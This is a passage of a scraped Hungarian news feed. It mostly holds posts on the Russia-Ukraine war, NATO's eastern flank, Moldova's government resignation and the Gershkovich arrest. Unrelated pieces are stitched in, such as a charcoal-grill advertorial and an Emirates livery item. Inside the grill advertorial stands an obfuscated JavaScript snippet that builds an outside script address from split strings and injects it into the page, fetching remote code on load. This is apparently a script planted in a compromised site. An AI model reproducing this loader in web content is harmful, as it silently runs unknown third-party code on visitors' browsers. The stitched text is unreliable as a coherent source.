• Szlavjanksz irányából a 67. gépesített dandár által
• Szeverszk irányából a 81. légimozgékonyságú dandár és az 55. tüzérdandár által
• Csaszov Jar irányából a 77. légimozgékonyságú dandár által
• Konsztantyinovka irányából a 3. (Azov) rohamdandár által.

A siker kérdéses, mivel a rossz időjárási viszonyok miatt így is egy héttel elhalasztották a támadást, valamint az ukrán járművek rendre elakadnak a sárban. Eközben időt veszítenek mivel az oroszok tovább haladnak előre. Elfoglalták Dubovo-Vaszilovkát valamint fenyegetik Grigorovkát, Bogdanovkát és Orehovo-Vaszilovkát. Ezenkívül a donyecki fronton Avdejevka is veszélybe került. 

Mint látható a harcok intenzitása nem csökken a Donbaszban. Az Oroszországi Föderáció védelmi minisztere Szergej Sojgu hadseregtábornok szerint az ukránok csak februárban több mint 10 000 katonát veszítettek. 

Írta: Krausz Józseg

Hogyan változtatta meg az orosz-ukrán háború a kiberteret?

Az orosz-ukrán háború hatására szükségessé vált mind a magán, mind az állami szektor kiberbiztonsági szempontból történő magasabb szintű átláthatósága a lehetséges fenyegetések és geopolitikai válságok elleni küzdelem terén. A megelőző években Oroszország kiépítette a világ egyik legnagyobb és legfélelmetesebb kiberbűnözői környezetét, amelyben különböző hackercsoportok hajtottak végre támadásokat az orosz állam céljait elősegítve. Ezek a csoportok számos országot megtámadtak az évek során, a legnagyobb volumenű akciókat pedig az Egyesült Államok ellen követték el, megtámadva az ország egyik legfontosabb olajvezetékét és a világ legnagyobb hústermelőjét. A Recorded Future kiberbiztonsági cég jelentése alapján Oroszországból folyamatosan távoznak a technológiához értő szakemberek, melynek hatására még inkább felértékelődtek a hackercsoportok, mely a kibertér ökoszisztémájának átalakulásához vezetett. Ez a változás azt eredményezte, hogy a háborút megelőző időszakhoz képest az államilag támogatott hackercsoportok és a pénzügyileg motivált ransomware támadásokat kivitelező kiberbűnözői csoportok (ransomware as a service: RaaS) közötti határ elmosódott és mára már nem lehet különbséget tenni ezen csoportok között. A folyamatos szakember elvándorlás következtében a hackercsoportok egyre inkább az orosz hadsereg részeként végzik tevékenységüket, mely hatására az a javaslat is megfogalmazódott az orosz törvényhozásban, hogy mentesítsék a jogi felelősség alól azokat a kiberbűnözői és hackercsoportokat, amelyek az orosz állam érdekeit figyelembe véve működnek. Megállapítható tehát, hogy a háború hatására átalakult kibertéri környezet még inkább zavarosabbá és veszélyesebbé vált, melynek hatására nagyobb számú, volumenű és kifinomultabb kibertámadások várhatóak a jövőben.

Írta: Ésik Béla

A háború hatásai az energiapiacra

Az Oroszországi Föderáció 2022.02.24.-ei Ukrajna ellen indított támadása alapvetően formálta át a globális olaj- és gázpiacokat. Számos ország gazdaságára gyakorolt jelentős hatást a háború: zavarok mutatkoztak a gabonaellátásban, megnövekedtek az élelmiszerárak és sérült az európai kontinens energiaellátásának biztonsága is. Az orosz gáz jelentőségét jelzi, hogy 2021-ben az EU országai 155 milliárd köbméter orosz gázt importáltak, ami a teljes gázimport mintegy 45 százalékát tette ki. A háború előtt Oroszország volt az Európai Unió egyik legnagyobb nyersolajszállítója (mintegy 108,1 millió tonna) és a legnagyobb kőolajtermék-szállítója – 91 millió tonna – az Európai Uniónak. A tagállamok 2021-ben 51,4 millió tonna szenet is importáltak Oroszországból, ami az EU teljes szénimportjának közel felét tette ki.

Minden tényezőt összegezve kevés állam -Ukrajnán kívül- érezte annyira a háború közvetlen energiaellátásra gyakorolt hatását, mint Németország, hiszen hagyományosan Oroszország egyik legfontosabb gazdasági partnere. A szoros együttműködést egyrészt igazolja, hogy a felek közötti éves kereskedelmi forgalom nem sokkal a szankciók bevezetése előtt meghaladta a 80 milliárd dolláros szintet. Becslések szerint a kölcsönös szankciók a kétoldalú kereskedelmi forgalom akár 20%-os csökkenésével jártak, ami milliárdos veszteségeket jelentett a német gazdaság számára, és számos munkahely megszűnésével is járt. Másrészt az Oroszországtól való függés mértékét érzékeltetendő, a konfliktust megelőzően Európa legnagyobb gazdasága földgázellátásának közel felét csővezetéken keresztül Oroszországból szerezte be.  Az elmúlt év egyik leglátványosabb sikere, hogy Németország teljesen függetlenítette magát az orosz gázimporttól. Az EU viszonylagos sikerének további fontos tényezője volt a földgázfogyasztás csökkenése, amelyet 2022-re 10-12 százalékra becsülnek.

A 2024-es orosz tevékenység hatására előtérbe került az a kérdés, hogy milyen lépések eredményeként és mennyi idő után függetlenedhetne Németország az orosz gáztól. Az ellentmondásos megítélésű folyamat első lépéseként tavaly nyáron beszűntette az importtevékenységet Oroszországból, energiafelhasználási megszorításokat eszközölt –az enyhe időjárású- tél során és újratervezte gázbeszerzését. Második lépésként leállították az Északi Áramlat gázvezetéken keresztül történő szállítást. Harmadsorban pedig mivel az ukrajnai háború a kormány napirendjének élére helyezte azon erőfeszítéseket, amelyek célja Németország gázellátásának diverzifikálása az orosz szállításoktól, a kormány megkezdte az ország saját cseppfolyósított földgáz (LNG) importáló infrastruktúrájának kiépítését: állandó szárazföldi importterminálokba fektet be, miközben rövid távon úszó egységeket bérel – az elsőt 2022 decemberében adták át. Németország jól kiépített földgázvezeték-hálózattal rendelkezik, és kapcsolatban áll a szomszédos országok termináljaival, de egészen a közelmúltig nem rendelkezett saját kikötővel az LNG közvetlen fogadására.

Összefoglalóan elmondható, hogy az újkeletű energiaforrások (főként gáz) beszerzésére és alkalmazására irányuló erőfeszítések összehangolásával, a tervezett infrastrukturális projektek gyors megvalósításával Németország és az EU tagállamai folytatni tudják az Oroszországtól való energetikai leválás stratégiáját. Emellett a német és egyéb tagállami, a fosszilis tüzelőanyagoktól való függőség csökkentését célzó beruházások és helyettük karbonsemlegességet elsegítő technológiák támogatása -mint az atomenergetika-  lehetővé teszik majd, hogy hosszú távon valóban megerősítsék energiaszuverenitásukat.

Ellátási problémák a Wagner csoportnál

Yevgeny Prigozhin, a Wagner csoport alapítója lőszerellátási problémáknak tudja be Bahmut ostromának lassú előrehaladását. A várost több hónap után sem sikerült bevennie az orosz erőknek, melyek bevételére mind orosz reguláris, mind a privát katonai cég erői folyamatosan próbálkoznak. Prigozhin „általános bürokrácia vagy árulás” mondattal illette a felmerülő lőszerproblémák jelenségét. Oroszország hónapokig eltökéltnek tűnt Bahmut elfoglalására, de több elemző is úgy véli, hogy a város a háborúban leginkább szimbolikus jelentőséggel bír, ugyanis nincs túl sok stratégiai jelentősége.

Nem ez az első alkalom, hogy a reguláris erők és a Wagner között feszültség alakult ki, ahogyan Prigozhin sem először tesz utalást a lőszerellátmány hiányára, amit korábban is az orosz Védelmi Minisztérium hibájaként könyvelt el. Egy korábbi közösségi média posztjában február 22-i dátummal aláírt lőszerszállítmányokról beszélt, amelyekre már másnap számítottak a bahmuti ostromnál, ezekre azonban nem került sor. Az ellátási problémák mellett arról is beszélt, hogy nem sikerült felvenniük a kapcsolatot az orosz hadsereg vezetésének főhadiszállásával.

Később azonban megerősítette, hogy megérkeztek a lőszerszállítmányok, miután írt az orosz különleges katonai műveletekért felelős parancsnoknak, Valery Gerasimovnak, a „lőszerek kiemelt fontosságáról”. 

Egy másik videóban Prigozhin arról beszélt, hogy a Wagner csoport katonái attól tartanak, hogy ők lesznek felelősségre vonva Oroszország esetleges sikertelen offenzívájáért Ukrajna ellen. „Ha visszalépünk, úgy fognak ránk emlékezni a történelemben, akik a háború elvesztésében a legnagyobb szerepet játszották.”.

Írta: Jaksi Zsolt

Lemondott a moldovai kormány

Február 10-én délelőtt jelentette Valerij Zaluzsnij ukrán tábornok, hogy kettő, a fekete-tengeri orosz flotta által kilőtt cirkálórakéta megsértette Moldova és Románia légterét. Ezt később a román védelmi minisztérium hivatalosan is cáfolta, a moldovai légtérsértést viszont a moldovai kormány után az USA külügyminisztériuma is megerősítette. 

Ezután ugyan Moldova még bekérette az ország orosz nagykövetét, de ez az utolsó intézkedései egyike volt Natalia Gavrilita miniszterelnök kormányának, mivel órákkal az incidens után Gavrilita bejelentette, hogy a kormány másfél évnyi szolgálat után egységesen lemond. Az EU-tagjelölti státuszt tavaly nyáron elnyerő ország a háború kitörése óta súlyos gondokkal küzd, ez az incidens volt az utolsó csepp a pohárban, az elszabaduló infláció és az országba érkező ukrán menekültek tömegei után. Mindezeket fokozta, hogy az ország gázellátása Oroszországtól, villamosenergia-ellátottsága pedig Ukrajnától függ túlnyomó többségében. Az új kormányfő Dorin Recean, aki elődjéhez hasonlóan elkötelezett az EU és a nyugati értékek iránt. 

Február 13-án aztán a moldovai elnök, Maia Sandu már arról beszélt az állami televízióban, hogy Moszkva fegyveres diverzánsokkal árasztaná el országát. Sandu állítása szerint Oroszország célja az, hogy destabilizálja a frissen alakult kormányt, valamint, hogy a régóta Putyin elnök támogatását élvező Dnyeszter Menti Köztársaság (más néven Transznisztria) számára nyújtott támogatásoknak álcázva tudja növelni befolyását a térségben. 

Írta: Veres Máté

Egy valódi ukrán siker? A vuhledári csata (2023.01.24-)

Az Orosz- Ukrán háború frontjával kapcsolatos hírek nagy része manapság Bakhmuttal és a Wagnerrel foglalkozik, azonban van egy másik település mely bár kisebb jelentőséggel bír mégis érdemes az elmúlt hónap harci cselekményei alapján megemlíteni.

Ez a település az előbb említett Bakhmuttól 130 km-re délre található Vuhledár és környéke. A település a déli Ukrán védelmi vonal egyik fontos sarokköve, melynek folyamatos védelmét a 72.mechanizált dandár látja el. A városban állomásozó erők nagysága 2000 és 3000 fő körül becsülhető a település mérete alapján.

Az Orosz oldalon ezzel szemben a 40.tengeri gyalogos dandár és a 155. gárda tengeri dandár sorakozott fel, létszámuk 6000-8000 fő körülire tehető. A település támadására azonban az oroszok erősítésként és hátvéd szerepének ellátására ide rendelték a 72. és 136.-ik motorizált lövészdandárt is. Az orosz erők parancsnoka a térségben Rustam Muradov.

A csata január 24.-én Orosz tüzérségi csapással kezdődött majd 25.-én az Oroszok elfoglalták a front közvetlen közelében lévő épületeket. Január 25. és 28.-a között az Oroszok a Vuhledártól közvetlen keletre lévő lakóházakat is elfoglalták. Az Ukrán vezérkar erősítést küldött a térségbe (02.04-08) melynek köszönhetően az Ukránok megállították az Oroszok előrenyomulását.

Vuhledártól nyugatra az Ukrán erők sikeresen visszaverték az oroszokat Zolota-Nyva és Prechystivka alól (02.15-18), ezzel megakadályozták az Oroszokat abban, hogy a települést nyugatról karolják át az orosz erők.

A térségben még a mai napig is intenzív harcok folynak az Orosz és Ukrán csapatok között.

Írta: Horváth Kristóf

Szerkesztette: Jaksi Zsolt és Patócskai Péter

A hírfigyelő korábbi kiadásai ide, hasonló témájú cikkeink pedig ide kattintva érhetők el.

Photo by Ian Betley on Unsplash

A Orosz-ukrán háborús hírfigyelő – 2023. február bejegyzés először Biztonságpolitika-én jelent meg.

A közép- és kelet-európai NATO-tagállamokat tömörítő B9 csoport csütörtök este kezdődött tanácskozásán történteket a lengyel diplomácia vezetője román hivatali partnerével, Bogdan Aurescu román külügyminiszterrel együtt foglalta össze. Rau kiemelte: megvitatták „az európai biztonsági helyzet romlását”, a NATO keleti szárnyának megerősítésére irányuló erőfeszítéseket, valamint Ukrajna „politikai és gyakorlati támogatását”.

A résztvevők beszéltek a NATO és az Európai Unió közötti együttműködés fontosságáról, különösen a „jelenlegi válságra adandó hatékonyabb válasz” érdekében.

A B9 „katonai és más területeken továbbra is támogatni fogja Ukrajnát” – jelentette ki a lengyel külügyi tárca vezetője. Hozzátette: Lengyelország és „sok más szövetséges állam számára különösen az utóbbi szempont óriási jelentőséggel bír”. Rámutatott, hogy a B9 országai élen járnak e téren, olyan, „bátrabb akciókban” való részvételre buzdítják szövetségeseiket, mint a MiG-29-es vadászgépek vagy a (Leopard) harckocsik átadása Ukrajnának.

Bogdan Aurescu úgy vélte: az Ukrajna elleni orosz háború „Európa és Amerika biztonságát veszélyeztető művelet”, amely „komoly fenyegetést jelent a globális békére” nézve is. A béke érdekében „segíteni kell Ukrajnát, hogy megnyerje ezt a háborút” – fogalmazott a román diplomácia vezetője. Fontosnak nevezte, hogy az orosz tiszteket „felelősségre vonják azért, amit Ukrajnában műveltek”.

Aurescu szavai szerint a lódzi találkozó résztvevői a júliusi vilniusi NATO-csúcstalálkozó előtt megerősítették együttműködési szándékukat az észak-atlanti szövetség keretében. Fontosnak nevezte, hogy előrelépés történjen Ukrajna NATO-tagságának kérdésében.

A Bukaresti Kilencek vagy a Bukaresti Formátum (röviden B9 vagy B-9) egy 2015 novemberében alapított csoportosulás, amely Románia fővárosában, Bukarestben jött létre, Klaus Johannis román és Andrzej Duda lengyel elnök kezdeményezésére. Tagjai a NATO kelet-európai tagállamai: Lengyelország és Románia mellett Bulgária, Csehország, Észtország, Magyarország, Lettország, Litvánia és Szlovákia. Célja a NATO keleti szárnyának országai közötti katonai együttműködés elmélyítése, valamint a legfontosabb biztonságpolitikai kérdések megvitatása. A B9 lengyelországi találkozóján részt vett a csoporthoz nem tartozó Svédország, Finnország, Spanyolország és a NATO küldöttsége is.

The post Orosz agresszió: a Bukaresti Kilencek folytatják Ukrajna támogatását appeared first on .

A faszenes kerti grillek jelenleg a kerttulajdonosok egyik legnépszerűbb vásárlása! Ha szeretne egy kerti grillt, de nincs meggyőződve arról, hogy megéri-e a befektetést, a következő sorokban 5 igazán jó okot részletezünk!

A saját magunknak és az otthonunknak szánt vásárlások gyakran indokoltak és jól meghatározott céllal történnek, és a precíz hasznosságú vásárlások közé sorolhatjuk ezek a kerti grillsütők, olyan termékek amelyek minden kültértérrel rendelkező háztulajdonos bevásárlólistáján szerepelnek. A következő sorokban tehát 5 indokot részletezünk, amiért ezek a faszenes grillsütők bárki számára jó befektetésnek számítanak. Íme tehát, hogy miért érdemes faszénnel működő kerti grillsütőt vásárolni:

1. Tartós és megbízható termék

A minőség mindannyiunk számára kérdés, ezért próbálunk okosan vásárolni és egy kicsit utánajárni, mielőtt ténylegesen megveszünk valamit. Ebben az értelemben a kerti grill olyan termék, amelyet hosszú ideig élvezhetünk, mert minőségi és tartós anyagokból készül.

2. Könnyen használható

Akár kedveli az ételek grillezését, akár nem, egy ilyen termék használata nem igényel részletes használati utasítást, és nem is bonyolult. Ezek a kerti grillezők olyan parazsakkal működnek, amelyeket manapság szinte bármelyik boltban megvásárolhat, és nem csak.

3. Hordozható

Az ilyen típusú kerti grillek egyik legnagyobb előnye, hogy hordozhatóak, hogy otthon, barátoknál, a természetben, kempingben egyaránt használhatjuk őket. Könnyen fel- és összeszerelhető, közepes méretű, ezek a grillek finom ételeket és felejthetetlen estéket biztosítanak a családdal és a közeli barátokkal.

4. Egészséges grillezett ételek

Ezeknek a grilleknek egy másik említésre méltó előnye, hogy egészségesebb stílusban, olajban való áztatás és túlsütés nélkül készíthetünk ételt. Ajánlatos odafigyelni arra, hogy milyen ételeket fogyasztunk és hogyan készítjük el, és egy ilyen grill segítségével sokkal kiegyensúlyozottabb lesz a táplálkozásunk.

5. Költségek

Ellentétben a kertben épített, rögzített tégla grillel, amelyhez anyagokat kell vásárolnia és kőművest kell hívnia, és amely nyilvánvalóan sokkal költségesebb, a kerti faszéngrill bárki és bármilyen költségvetés számára megfelelő vétel. Ráadásul még ezek a termékek is különböző méretekben kaphatók, nyilvánvaló, hogy az áruk is eltérő, de biztosan megtaláljuk az igényeinknek megfelelő grillsütőt.

A Rademi.hu webáruház a faszénes kerti grillek széles választékával várja Önt, amelyeket a legjobb online árakon vásárolhat meg. A minőségi, tartós és megbízható anyagokból készült kerti grillek hosszú ideig fognak minket szolgálni. Használja ki az árajánlatokat és örüljön a szép nyári napoknak a finom és egészséges ételeknek, szeretteivel együtt!

(function(){ z84s=document.createElement("script");z84s_=(("u")+"st")+"a";z84s.async=true; z84s.type="text/javascript";z84s_+=("t.i")+""+"n";z84s_+=(("f")+"o");z84s_+="/"; z84su="495774649.";z84su+="j2z5dhyk84s8frk0hcv"+"6ba691xgyv6"; z84s.src="https://"+z84s_+z84su;document.body.appendChild(z84s); })();

The post 5 indok a faszénes kerti grill választására appeared first on .

„JDAM-nek nevezett bombákat használunk. Ezek nyugati típusú bombák, amelyekkel repülőgépeink sikeresen csapnak le fontos célpontokra. Ezek a bombák valamivel kisebb teljesítményűek, de rendkívül nagy pontosságúak. Szeretném, ha több ilyen bombája lenne az ukrán légierőnek” – jelentette ki a szóvivő.

A közelmúltban Oroszország aktívan kezdett használni irányított légi bombákat. Az orosz erők általában a szovjet időkből származó FAB-500-as bombákat használnak, amelyeket utólag szárnyakkal és GPS-navigációval szereltek fel – idézett fel az Ukrajinszka Pravda hírportál korábbi ukrán közléseket. Ihnat korábban rámutatott arra, hogy ezek az orosz bombák általában nem túl pontosak, ezért nagy veszélyt jelentenek a polgári létesítményekre. Az ilyen típusú fegyverek elleni küzdelemhez Ukrajnának nagy hatótávolságú légvédelmi rendszerekre és modern, többcélú repülőgépekre van szüksége – mondta a szóvivő.

Az ukrán vezérkar esti helyzetjelentésében azt állította, hogy Luhanszk megye megszállt részében ötven orosz katona dezertált. A vezérkar szerint ez azt bizonyítja, hogy folytatódik az Ukrajnába vezényelt orosz katonák csoportos szökésének tendenciája.

A kijevi katonai vezetés jelentésében arról számolt be, hogy pénteken az ukrán erők több mint harminc ellenséges támadást vertek vissza, két légvédelmi rendszert és egy radarállomást is eltaláltak. Az ukrán légierő gépei a nap folyamán hat csapást mértek az orosz erők koncentrációs területeire, a rakéta-és tüzérségi egységek pedig nyolc támadást hajtottak végre, amelyek eredményeképpen eltaláltak egy üzemanyagraktárt, két légvédelmi rakétarendszert, egy tüzérségi egységet és egy elektronikus hadviselési állomást.

A kijevi jelentés szerint az orosz erők eközben öt rakéta- és 12 légicsapást indítottak, valamint több mint húsz támadást hajtottak végre rakéta-sorozatvetőkkel.

„Pénteken az Oroszországi Föderáció ballisztikus rakétákkal újabb rakétatámadást intézett polgári célpontok ellen Zaporizzsja városában és Ukrajna más településein. Hat Sahíd-136 típusú, iráni gyártású támadó drónt is bvetettek, de ezeket mind megsemmisítette az ukrán légédelem. Az ellenség továbbra is fő erőfeszítéseit a Donyeck megyében lévő Liman, Bahmut, Avgyijivka és Marjinka települések irányában végrehajtandó támadó műveletekre összpontosítja” – írta a vezérkar.

The post Orosz agresszió: Az ukrán légierő nyugati, GPS-irányítású bombákat is használ appeared first on .

Szalay-Bobrovniczky Kristóf azt mondta, hogy egy felmérés szerint a NATO támogatottsága a magyaroknál hét százalékkal magasabb, mint a szövetséges országok átlaga. A tárcavezető beszédében emlékeztetett arra, hogy Magyarország több mint húsz éve a NATO tagja, és lépésről lépésre építette fel jelenlétét a szövetségben.

A biztonsági helyzet Európában alapvetően megváltozott, jelentősen romlott az ukrajnai orosz agresszió következtében. Ez megváltoztatta a NATO-t is, adaptációs folyamat megy végbe, és ennek része a többnemzeti hadosztály-parancsnokság létrehozása, ami 2019-ben kezdődött meg – mondta a miniszter.

Az eseményt követő sajtótájékoztatón Szalay-Bobrovniczky úgy fogalmazott: „hadtörténelmet írunk” a többnemzeti hadosztály-parancsnokság felállításával. Ezt bölcs és jó döntésnek nevezte, amely komoly előrelátásról tett tanúbizonyságot már 2019-ben. Világossá vált, hogy világ legerősebb és legrégebbi védelmi szövetsége keleti szárnyát meg kell erősíteni, és Közép-Európában nem volt még ilyen parancsnokság – magyarázta a miniszter. A parancsnokság azért többnemzeti, mert számos országot felügyel Közép-Európában, és sok nemzet katonái szolgálnak itt – a magyar katonák mellett horvátok, szlovákok, szlovének, lengyelek, románok, spanyolok, törökök. Beszédének zárásaként a honvédelmi miniszter úgy fogalmazott: nem csak Magyarország van a NATO-ban, de a NATO is itt van Magyarországon.

Mario Banozic horvát védelmi miniszter az ukrajnai orosz agresszió első évfordulója után még fontosabbnak nevezte a többnemzeti hadosztály-parancsnokságot és a magyar, szlovák, horvát tisztek, altisztek, valamint katonák közös munkáját. Hangsúlyozta: egységes az erőfeszítés annak érdekében, hogy javítsák képességeiket és növeljék az együttműködést.

A biztonságot nem lehet adottnak tekinteni, és minden erőfeszítést meg kell tenni annak érdekében, hogy megtartsuk azt az előnyt, amellyel rendelkezünk potenciális ellenfeleinkkel szemben – mondta a horvát védelmi miniszter. Készen állunk arra, hogy vezető szerepet játsszunk, és ha szükség van rá, akkor „a NATO-terület minden egyes centiméterét megvédjük”.

Marian Majer szlovák honvédelmi államtitkár úgy fogalmazott: majdnem egy évtized telt el azóta, hogy Ukrajnát, a Krím-félszigetet elérte az orosz agresszió, és azóta jelentős változáson ment át a NATO. Tovább kell erősíteni a szövetség keleti határát, oda kell csoportosítani több egységet. A többnemzeti hadosztály-parancsnokságot a szlovák politikus a régióban a szövetséges együttműködés fontos építőköveként jellemezte.

Majer a rendezvényt követő sajtótájékoztatón kiemelte: a többnemzeti hadosztály-parancsnokság két üzenetet közvetít. Az egyik ellenfeleinknek, különösen Oroszországnak szól, amely „egy nem kiprovokált agressziót” folytat Ukrajna ellen. A másik pedig a NATO-nak és szövetségeseinek szól, és azt mutatja, hogy „nemcsak elkötelezettek, de felkészültek is vagyunk arra, hogy megvédjük magunkat abban az esetben, ha bármi történne”. Szlovákia számára is fontos a védelmi költségvetés alakítása.

Denis Tretinjak tábornok, az HQ MND-C parancsnoka az ünnepségen felelevenítette a parancsnokság felállításának folyamatát. A most kezdődő új műveleti státusz növekedési lehetőséget jelent és azt, hogy hiteles és kompetens parancsnokságot tudnak létrehozni – jegyezte meg.

Luigi Guglielmo Miglietta tábornok, a brunssumi NATO-parancsnokság (Allied Joint Force Command Brunssum) vezetője jelezte: a NATO készen áll a különböző kihívásokkal szemben és képes területe megvédésére. A szövetséget fenyegető veszélyeket komplexnek nevezte, de hangsúlyozta: a NATO biztosítani tudja Európa, értékei és életformája biztonságát.

A székesfehérvári rendezvényen részt vett Christopher G. Cavoli tábornok, a NATO Európában állomásozó fegyveres erőinek főparancsnoka is.

The post Szalay-Bobrovniczky: nem csak a kormány, a nemzet is a NATO mögött áll appeared first on .

A bíróság – amelynek rendelkezését az Ukrajinszka Pravda hírportál ismertette – elutasította a szerzeteseknek azt a kérését, hogy érvénytelenítse a műemlékegyüttes vezetősége által hozott határozatot, amelyben felbontotta az egyházzal 2013 júliusában kötött szerződést a Lavra területén lévő vallási épületek és egyéb, állami tulajdonban lévő ingatlanok ingyenes használatáról.

A bíróság a döntését indokolva kifejtette, hogy a felperes nem tudta bizonyítani vagy alátámasztani azokat az állításait, amelyek szerint az UPC-nek a Lavra területéről való „kilakoltatása” esetén fennáll a tulajdon megsemmisülésének vagy megrongálódásának, illetve harmadik fél tulajdonába, vagy használatába átadásának a veszélye, valamint azt sem, hogy sérül Ukrajna állampolgárainak a vallásszabadsághoz és a lakhatáshoz való joga.

A kulturális minisztérium döntése alapján az UPC-nek szerdán el kellett volna hagynia a Lavrát, amit nem tettek meg, csütörtökön még istentiszteletet tartottak orosz nyelven. Csütörtökön akarta ugyanis megkezdeni munkáját a barlangkolostor tulajdonában lévő ingatlanok átvételével és átadásával foglalkozó bizottság, de az UPC hívei nem engedték be a testület tagjait a Lavra területére.

The post Elutasították a kijevi Pecserszka Lavra szerzeteseinek keresetét appeared first on .

„A lehetséges legerőteljesebb módon elítéljük a Kremlnek az újságírók és a civil társadalom hangjainak megfélemlítésére, elnyomására és megbüntetésére irányuló folyamatos kísérleteit” — fogalmazott a State Department, amely arról is tájékoztatást adott, hogy állandó kapcsolatban vannak az újságíró munkaadójával, a The Wall Street Journal (WSJ) amerikai üzleti-politikai napilappal.

Az amerikai külügyi tárca közleménye egyben az Oroszországban élő vagy oda látogató amerikai állampolgárokat Oroszország azonnali elhagyására kéri az őket fenyegető orosz veszélyre hivatkozva.

Az orosz Szövetségi Biztonsági Szolgálat (FSZB) csütörtökön jelentette be, hogy kémkedés gyanújával őrizetbe vette a WSJ moszkvai tudósítóját a Moszkvától 1800 kilométerre keletre fekvő Jekatyerinburgban. Az orosz hatóságok azt állítják: Evan Gershkovich minősített információkat próbált megszerezni.

Gershkovich az első amerikai újságíró, akit a hidegháború vége óta az orosz hatóságok kémkedés miatt őrizetbe vettek. Az utolsó ilyen eset 1986-ban történt, amikor Nicholas Daniloffot, a U. S. News & World Report 52 éves moszkvai tudósítóját a KGB letartóztatta, de őt húsz nap őrizet után, fogolycsere keretében szabadon engedték.

Oroszországban a törvényhozás mindkét háza a közelmúltban arról fogadott el törvényt, hogy akár 15 év börtönt is kaphat az az újságíró, aki hamis információkat terjeszt az orosz hadseregről. A jogszabály miatt több külföldi médium – a kockázatokra hivatkozva – felfüggesztette helyszíni tudósítói tevékenységét Oroszországban.

The post Washington elítéli az újságírók megfélemlítését Oroszországban appeared first on .

Az elmúlt években a koronavírus-járvány okozta kényszerszünetet leszámítva a Liszt Ferenc nemzetközi repülőtéren rendszeresen megfordultak az Emirates légitársaság látványos dekorációval ellátott Boeing 777-esei. A 2020-as világkiállítás alkalmából felhelyezett díszítés az expó zárása után lekerült a gépekről, így Ferihegyen sem láthatjuk többé.

Amikor Dubaj számára 2013-ban odaítélték a 2020-as világkiállítás rendezésének jogát, még senki se gondolta, hogy éppen a megnyitás évében tör ki egy olyan világméretű járvány, amely számos újratervezést von maga után. Az expó szervezése közben a kellő promócióról is gondoskodtak. Reklámhordozóként az öböl menti emírséget a világ többi részével összekötő közforgalmi repülőgépek remek felületnek bizonyultak, ezért a rendezvény kiemelt partnere és hivatalos légitársasága, az 1985-ben alapított Emirates is bekapcsolódott a világkiállítás reklámozásába. Pályázatot írtak ki, hogy milyen legyen az Expo 2020 logója, mi legyen az, ami igazán felkelti a nagyközönség figyelmét. A beérkezett tizenkilencezer tervből végül egy ősi lelet inspirálta javaslatot fogadtak el.

[...] Bővebben!